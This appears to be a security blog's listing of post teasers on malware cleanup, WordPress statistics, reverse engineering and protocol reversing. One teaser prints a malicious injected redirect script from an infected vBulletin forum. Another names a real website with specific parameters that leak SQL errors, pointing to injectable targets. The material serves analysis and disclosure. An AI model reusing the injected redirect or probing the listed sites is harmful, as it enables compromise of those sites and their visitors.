vBulletin wired infection case (filestore72.info redirection)
Problem site redirects to filestore72.info when visiting it from Google Investigation Visit web site from google search results, notice redirection issue From browser console we can see that issue caused by following script: <script type=”text/javascript” src=”http://example.org/clientscript/vbulletin-core.js?v=425″></script> <script type=”text/javascript” src=”http://example.org/misc.php?v=425&js=js”></script> … with following content document.location=’http://filestore72.info/download.php’ Make same request using Fiddler2 or any similar tool to index […]
WordPress files statistics, binary and text file types
Bigdata processing is a one of the most popular instruments nowdays, WordPress is a one of the most populat content mamagement systems nowdays. So what will be if we will cross those popular things and try to get various interesting statistical information. How to use this statistics is up to you. Let’s try and see […]
Vulnerable resources – digest part 1 – 15.01.2016
List of vulnerable resources – part 1 303gallery.com Vulnerable argument ‘exhid‘ in GET http://303gallery.com/index.php?exhid=411&p=images unable to obtain exhibition list from database: you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ‘”,[–‘ and exh_ar… Vulnerable argument ‘iid‘ in GET http://303gallery.com/index.php?iid=1216833&exhid=411&p=img error retrieving […]
Restore protocol model / Reversing communication protocol
Restore protocol model / Reversing communication protocol What is this? This is a process of restoration of communication protocol internals: communication method, encryption information, data structures and logic component of communication. Why do we need this? Restoration of protocol information could be interested to many customers. Here are the reasons why it could be useful […]
What is reverse engineering?
What is reverse engineering? Reverse engineering is the process of taking a compiled binary and attempting to recreate (or simply understand) the original way the program works. A programmer initially writes a program, usually in a high-level language such as C++ or Visual Basic (or God forbid, Delphi). Because the computer does not inherently speak […]
